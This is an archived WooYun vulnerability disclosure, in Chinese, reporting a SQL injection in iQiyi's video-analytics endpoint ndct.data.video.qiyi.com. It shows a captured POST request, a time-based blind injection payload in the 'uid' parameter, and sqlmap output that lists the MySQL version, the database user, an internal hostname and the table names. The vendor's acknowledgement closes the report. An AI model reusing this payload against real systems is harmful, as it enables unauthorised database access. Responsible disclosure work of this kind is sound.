乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-24: 细节已通知厂商并且等待厂商处理中 2016-03-24: 厂商已经确认,细节仅向厂商公开 2016-04-03: 细节向核心白帽子及相关领域专家公开 2016-04-13: 细节向普通白帽子公开 2016-04-23: 细节向实习白帽子公开 2016-05-08: 细节向公众公开
rt
POST /send_core_info?uid=865700021218002&plat=222&ver=2.0.106 HTTP/1.1Host: ndct.data.video.qiyi.comUser-Agent: QY-Player-Android/2.0.106Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 1066{"version":"2.0","userID":"1209531862","ra":1,"tvid":"449747800","pform":6,"play_process":{"file_type":"F4V","hcdn_code":"13","step":3,"access_vrs":{"url":"http://cache.video.qiyi.com/vps?tvid=449747800&vid=8619c4c122f01ba70d5d45ce73e7646c&uid=1209531862&v=0&qypid=449747800_33&src=02022001010000000000&t=1458704349000&k_tag=1&k_uid=865700021218002&rs=1&vf=ec92d0a1519a58746ce9457f7f564b47","ip":"106.38.219.22","duration":344,"code":200,"return_data":""},"access_vip":{"url":"","ip":"","duration":0,"code":0,"return_data":""},"access_pdata":{"url":"http://data.video.qiyi.com/videos/v0/20160212/34/b2/9068a56cf18079e67665946f01f05bc7.f4v?qd_tvid=449747800&qd_vipres=0&qd_index=1&qd_aid=449747800&qd_stert=0&qd_scc=c6a193db5b6b1ed90e5323b1336ade72&qd_sc=a4f559061be96311318c6bc786e57297&qd_src=02022001010000000000&qd_ip=2ac82210&qd_uid=1209531862&qd_tm=1458704371000&qd_vip=0","ip":"106.38.178.240","duration":254,"code":200,"return_data":""},"cache_status":{"url":"","ip":"","duration":0,"code":0,"return_data":"","avgspeed":0,"302url":"","idc":"netcnc_oversea"}}}
注入参数在uid 但必须带上post数据目测是一个测试网络环境的数据库 仅证明存在 未深入
sqlmap resumed the following injection point(s) from stored session:---Parameter: uid (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: uid=865700021218002' AND (SELECT * FROM (SELECT(SLEEP(5)))GNYW) AND 'gEVx'='gEVx&plat=222&ver=2.0.106---back-end DBMS: MySQL 5.0.12banner: '5.6.26-log'current user: 'netdoctor@10.%.%.%'current database: 'netdoctor'hostname: '10.77.48.51'current user is DBA: Falsedatabase management system users [1]:[*] 'netdoctor'@'10.%.%.%'database management system users privileges:[*] %netdoctor% [1]: privilege: USAGEdatabase management system users roles:[*] %netdoctor% [1]: role: USAGEavailable databases [2]:[*] information_schema[*] netdoctorDatabase: netdoctor[5 tables]+---------------+| ndct_client || ndct_cmd || ndct_coreinfo || ndct_hcdninfo || ndct_pingback |+---------------+
危害等级:中
漏洞Rank:10
确认时间:2016-03-24 10:10
感谢您对爱奇艺PPS的关注,我们将尽快修复
暂无